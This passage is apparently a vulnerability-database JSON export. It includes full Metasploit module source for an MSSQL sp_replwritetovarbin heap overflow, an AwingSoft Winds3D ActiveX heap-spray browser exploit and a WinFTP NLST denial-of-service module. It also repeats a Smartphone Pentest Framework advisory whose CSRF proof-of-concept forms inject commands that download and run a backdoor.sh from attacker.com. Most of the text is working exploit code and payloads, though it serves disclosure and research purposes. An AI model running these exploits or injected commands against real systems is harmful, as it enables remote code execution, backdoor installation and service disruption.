(using call [ecx+displacement])\n vtable_off = (num + vt_off)\n sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')\n\n # stack -> heap\n hijack_off = vtable_off + ecx_disp\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n # becomes eax on mssql 2ksp4 (prevent crash)\n sploit[(vtable_off-4),4] = [writable].pack('V')\n\n # becomes eip after esp hijack\n fixesp_off = vtable_off + first_esp\n sploit[fixesp_off,4] = [fix_esp].pack('V')\n\n # rest of magic stack (disable DEP?)\n stack_off = vtable_off + esp_off\n stack = []\n stack << mytarget['Ret']\n stack = stack.pack('V*')\n # jump over the stuff that gets corrupted\n stack << \"\\xeb\" + [corruptable_bytes].pack('C')\n stack << rand_text_alphanumeric(corruptable_bytes)\n stack << payload.encoded\n sploit[stack_off,stack.length] = stack\n\n # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n\n print_status(\"Redirecting flow to %#x via call to our faked vtable ptr @ %#x\" % [mytarget['FixDisp'], vtable])\n end\n\n # encode chars that get modified\n enc = mssql_encode_string(sploit)\n\n # put the number in (start offset)\n runme = sqlquery.gsub(/%NUM%/, num.to_s)\n runme.gsub!(/%STUFF%/, enc)\n\n # go!\n if !mssql_login_datastore\n fail_with(Failure::NoAccess, \"Unable to log in!\")\n end\n begin\n mssql_query(runme, datastore['VERBOSE'])\n rescue ::Errno::ECONNRESET, EOFError\n print_error(\"Error: #{$!}\")\n end\n\n handler\n disconnect\n end\n\n\n def mssql_str_to_chars(str)\n ret = \"\"\n str.unpack('C*').each do |ch|\n ret += \"+\" if ret.length > 0\n ret += \"char(\"\n ret << ch.to_s\n ret += \")\"\n end\n return ret\n end\n\n\n def mssql_encode_string(str)\n badchars = \"\\x00\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\"\n\n enc = \"\"\n in_str = true\n str.unpack('C*').each do |ch|\n # double-double single quotes\n if ch 
== 0x27\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 4\n next\n end\n\n # double backslashes\n if ch == 0x5c\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 2\n next\n end\n\n # convert any bad stuff to char(0xXX)\n if ((idx = badchars.index(ch.chr)))\n enc << \"'\" if in_str\n enc << \"+char(0x%x)\" % ch\n in_str = false\n else\n enc << \"+'\" if not in_str\n enc << ch.chr\n in_str = true\n end\n end\n enc << \"+'\" if not in_str\n return enc\n end\n\n\n def mssql_query_version\n begin\n logged_in = mssql_login_datastore\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR\n return nil\n end\n\n if !logged_in\n fail_with(Failure::NoAccess, \"Invalid SQL Server credentials\")\n end\n res = mssql_query(\"select @@version\", datastore['VERBOSE'])\n disconnect\n\n return nil if not res\n if res[:errors] and not res[:errors].empty?\n errstr = \"\"\n res[:errors].each do |err|\n errstr << err\n end\n fail_with(Failure::Unknown, errstr)\n end\n\n if not res[:rows] or res[:rows].empty?\n return nil\n end\n\n return res[:rows][0][0]\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb"}, {"lastseen": "2019-11-24T09:39:39", "bulletinFamily": "exploit", "description": "This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. 
By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-11-14T04:36:20", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/AWINGSOFT_WEB3D_BOF", "href": "", "type": "metasploit", "title": "AwingSoft Winds3D Player SceneURL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# awingsoft_web3d_bof.rb\n#\n# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework\n#\n# Tested successfully on the following platforms:\n# - Internet Explorer 6, Windows XP SP2\n# - Internet Explorer 7, Windows XP SP3\n#\n# WindsPly.ocx versions tested:\n# - 3.0.0.5\n# - 3.5.0.0\n# - 3.6.0.0 (beta)\n#\n# Trancer\n# http://www.rec-sec.com\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow',\n 'Description' => %q{\n This module exploits a data segment buffer overflow within Winds3D Viewer of\n AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). 
This ActiveX is a plugin of\n AwingSoft Web3D Player.\n By setting an overly long value to the 'SceneURL' property, an attacker can\n overrun a buffer and execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'shinnai <shinnai[at]autistici.org>',\t# Original exploit [see References]\n 'Trancer <mtrancer[at]gmail.com>',\t \t# Metasploit implementation\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-4588' ],\n [ 'OSVDB', '60017' ],\n [ 'EDB', '9116' ],\n [ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process'\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # data segment size: 76180\n # crasher offsets: 2640, 2712, 8984, 68420, 68424\n [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 8984 } ]\n ],\n 'DisclosureDate' => 'Jul 10 2009',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Setup exploit buffers\n nops \t = Rex::Text.to_unescape([target.ret].pack('V'))\n ret \t = Rex::Text.uri_encode([target.ret].pack('V'))\n blocksize = 0x40000\n fillto = 500\n offset \t = target['Offset']\n\n # Randomize the javascript variable names\n winds3d = rand_text_alpha(rand(100) + 1)\n j_shellcode = rand_text_alpha(rand(100) + 1)\n j_nops = rand_text_alpha(rand(100) + 1)\n j_ret = rand_text_alpha(rand(100) + 1)\n j_headersize = rand_text_alpha(rand(100) + 1)\n j_slackspace = rand_text_alpha(rand(100) + 1)\n j_fillblock = rand_text_alpha(rand(100) + 1)\n j_block = rand_text_alpha(rand(100) + 1)\n j_memory = rand_text_alpha(rand(100) + 1)\n j_counter = rand_text_alpha(rand(30) + 2)\n\n # we must leave the page, 
so we use http-equiv and javascript refresh methods\n html = %Q|<html>\n<head><meta http-equiv=\"refresh\" content=\"1;URL=#{get_resource}\"></head>\n<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='#{winds3d}'></object>\n<script>\n#{j_shellcode}=unescape('#{shellcode}');\n#{j_nops}=unescape('#{nops}');\n#{j_headersize}=20;\n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;\nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};\n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});\n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});\nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};\n#{j_memory}=new Array();\nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};\n\nvar #{j_ret} = unescape('#{ret}');\nwhile (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); }\n#{winds3d}.SceneURL = #{j_ret};\nsetTimeout('window.location = \"#{get_resource}\";', 500);\n</script>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/awingsoft_web3d_bof.rb"}, {"lastseen": "2019-11-18T03:37:58", "bulletinFamily": "exploit", "description": "This module is a very rough port of Julien Bedard's PoC. 
You need a valid login, but even anonymous can do it if it has permission to call NLST.\n", "modified": "2017-07-24T13:26:21", "published": "2008-09-30T23:28:24", "id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/WINFTP230_NLST", "href": "", "type": "metasploit", "title": "WinFTP 2.3.0 NLST Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WinFTP 2.3.0 NLST Denial of Service',\n 'Description' => %q{\n This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-5666' ],\n [ 'OSVDB', '49043' ],\n [ 'EDB', '6581' ]\n ],\n 'DisclosureDate' => 'Sep 26 2008'))\n end\n\n def run\n return unless connect_login\n\n # NLST has to follow a PORT or PASV\n resp = send_cmd(['PASV'])\n\n raw_send(\"NLST #{'..?' 
* 35000}\\r\\n\")\n\n disconnect\n end\nend\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:VULN:12773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12773", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23127\r\nProduct: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. 
\r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the "system()" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in "SEAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. 
\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/SEAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="platformDD2" value='android' />\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in "CSAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/CSAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in "attachMobileModem.pl" script due to insufficient validation of user-supplied input passed via the "appURLPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl" method="post" name=f1>\r\n<input type="hidden" name="appURLPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in "guessPassword.pl" script due to insufficient validation of user-supplied input passed via the "ipAddressTB" parameter. 
The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/guessPassword.pl" method="post" name=f1>\r\n<input type="hidden" name="ipAddressTB" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).\r\n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:DOC:28856", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28856", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Antivirus crash on scanning malformed PE files.", "modified": "2006-03-09T00:00:00", "published": "2006-03-09T00:00:00", "id": "SECURITYVULNS:VULN:5878", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5878", "title": "Norton Antivirus DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nServ-U FTP Server Potential Denial of Service Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17409\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17409/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nServ-U FTP Server 6.x\r\nhttp://secunia.com/product/5878/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Serv-U, which potentially can be\r\nexploited by malicious people to cause a DoS (Denial of Service).\r\n\r\nThe vulnerability is caused due to an unspecified error and may be\r\nexploited to remotely crash the server via certain malformed\r\npackets.\r\n\r\nNOTE: The ZLib and OpenSSL libraries have also been changed to\r\nversion v1.2.3 and v0.9.8a respectively.\r\n\r\nSOLUTION:\r\nUpdate to version 6.1.0.4.\r\nhttp://www.serv-u.com/dn.asp\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.serv-u.com/releasenotes.asp\r\n\r\nOTHER 
REFERENCES:\r\nSA17151:\r\nhttp://secunia.com/advisories/17151/\r\n\r\nSA16137:\r\nhttp://secunia.com/advisories/16137/\r\n\r\nSA15949:\r\nhttp://secunia.com/advisories/15949/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-11-04T00:00:00", "published": "2005-11-04T00:00:00", "id": "SECURITYVULNS:DOC:10123", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10123", "title": "[SA17409] Serv-U FTP Server Potential Denial of Service Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Shell characters problem allow javacript execution in local zone.", "modified": "2004-03-10T00:00:00", "published": "2004-03-10T00:00:00", "id": "SECURITYVULNS:VULN:3512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3512", "title": "Microsoft Outlook shell characters problem", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:22", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "href": "https://packetstormsecurity.com/files/118743/Smartphone-Pentest-Framework-0.1.3-0.1.4-Command-Injection.html", "id": "PACKETSTORM:118743", "title": "Smartphone Pentest Framework 
0.1.3 / 0.1.4 Command Injection", "type": "packetstorm", "sourceData": "`Advisory ID: HTB23127 \nProduct: Smartphone Pentest Framework (SPF) \nVendor: Bulb Security LLC \nVulnerable Versions: 0.1.3, 0.1.4 and probably prior \nTested Versions: 0.1.3, 0.1.4 \nVendor Notification: November 19, 2012 \nPublic Disclosure: December 10, 2012 \nVulnerability Type: OS Command Injection [CWE-78] \nCVE Reference: CVE-2012-5878 \nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C) \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \n \nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \n \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/ \n \nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples. 
\n \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \n \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \n \n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \n \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. 
The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable. \n \nAs a temporary solution remove or disable SPF's GUI. 
\n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF). \n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/118743/smartphonepentestfw-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T07:20:47", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities. CVE-2012-5878. 
Webapps exploit for cgi platform", "modified": "2012-12-10T00:00:00", "published": "2012-12-10T00:00:00", "id": "EDB-ID:38114", "href": "https://www.exploit-db.com/exploits/38114/", "type": "exploitdb", "title": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/56881/info\r\n\r\nSmartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.\r\n\r\nRemote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application (i.e. with the privileges of the web server user, as stated in the High-Tech Bridge advisory) and may then attempt to escalate privileges to root. This may facilitate a complete compromise of an affected computer.\r\n\r\nSmartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. \r\n\r\n1.\r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n2. 
\r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n3.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n4.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38114/"}], "htbridge": [{"lastseen": "2019-04-10T17:55:38", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \nSimilar vulnerabilities were discovered (https://www.immuniweb.com/advisory/HTB23123, CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. 
